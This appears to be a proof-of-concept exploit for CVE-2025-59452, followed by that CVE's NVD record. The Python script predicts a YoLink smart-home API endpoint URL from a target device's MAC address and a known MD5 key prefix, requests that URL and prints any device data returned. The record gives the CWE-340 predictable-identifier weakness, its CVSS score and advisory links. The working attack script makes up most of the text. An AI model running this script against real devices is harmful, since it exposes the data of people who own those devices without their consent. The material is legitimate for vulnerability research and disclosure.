CVE-2025-59452

#!/usr/bin/env python3 """ CVE-2025-59452 - YoSmart YoLink API Endpoint URL Prediction PoC This PoC demonstrates how to predict the YoLink API endpoint URL based on the device's MAC address and the known MD5 hash key prefix. """ import hashlib import requests import sys import re def generate_endpoint_url(mac_address, key_prefix="cf50"): """ Generate the predicted YoLink API endpoint URL using MAC address and the known non-secret key prefix. """ # Normalize MAC address format mac_clean = mac_address.replace(":", "").replace("-", "").lower() # Construct the key using the known prefix key = key_prefix + mac_clean # Generate MD5 hash of the key md5_hash = hashlib.md5(key.encode()).hexdigest() # Construct the endpoint URL based on the hash and MAC endpoint = f"https://api.yosmart.com/device/{md5_hash[:16]}/{mac_clean}" return endpoint def validate_endpoint(url): """ Validate if the predicted endpoint is accessible. """ try: response = requests.get(url, timeout=10, verify=True) if response.status_code == 200: return True, response.json() return False, None except requests.exceptions.RequestException as e: return False, str(e) def main(): if len(sys.argv) < 2: print("Usage: python3 cve_2025_59452.py <MAC_ADDRESS>") print("Example: python3 cve_2025_59452.py AA:BB:CC:DD:EE:FF") sys.exit(1) mac_address = sys.argv[1] # Validate MAC address format if not re.match(r"^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$", mac_address): print("[!] Invalid MAC address format") sys.exit(1) print(f"[*] Target MAC Address: {mac_address}") # Generate the predicted endpoint URL endpoint_url = generate_endpoint_url(mac_address) print(f"[*] Predicted Endpoint URL: {endpoint_url}") # Attempt to access the endpoint print("[*] Attempting to access the endpoint...") success, data = validate_endpoint(endpoint_url) if success: print("[+] Endpoint is accessible!") print(f"[+] Response Data: {data}") else: print("[-] Endpoint is not accessible or returned an error") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-59452", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:36.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YoSmart YoLink API through 2025-10-02 uses an endpoint URL that is derived from a device's MAC address along with an MD5 hash of non-secret information, such as a key that begins with cf50."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-340"}]}], "references": [{"url": "https://bishopfox.com/blog/advisories", "source": "[email protected]"}, {"url": "https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/product-support", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/sa-2025-001", "source": "[email protected]"}]}}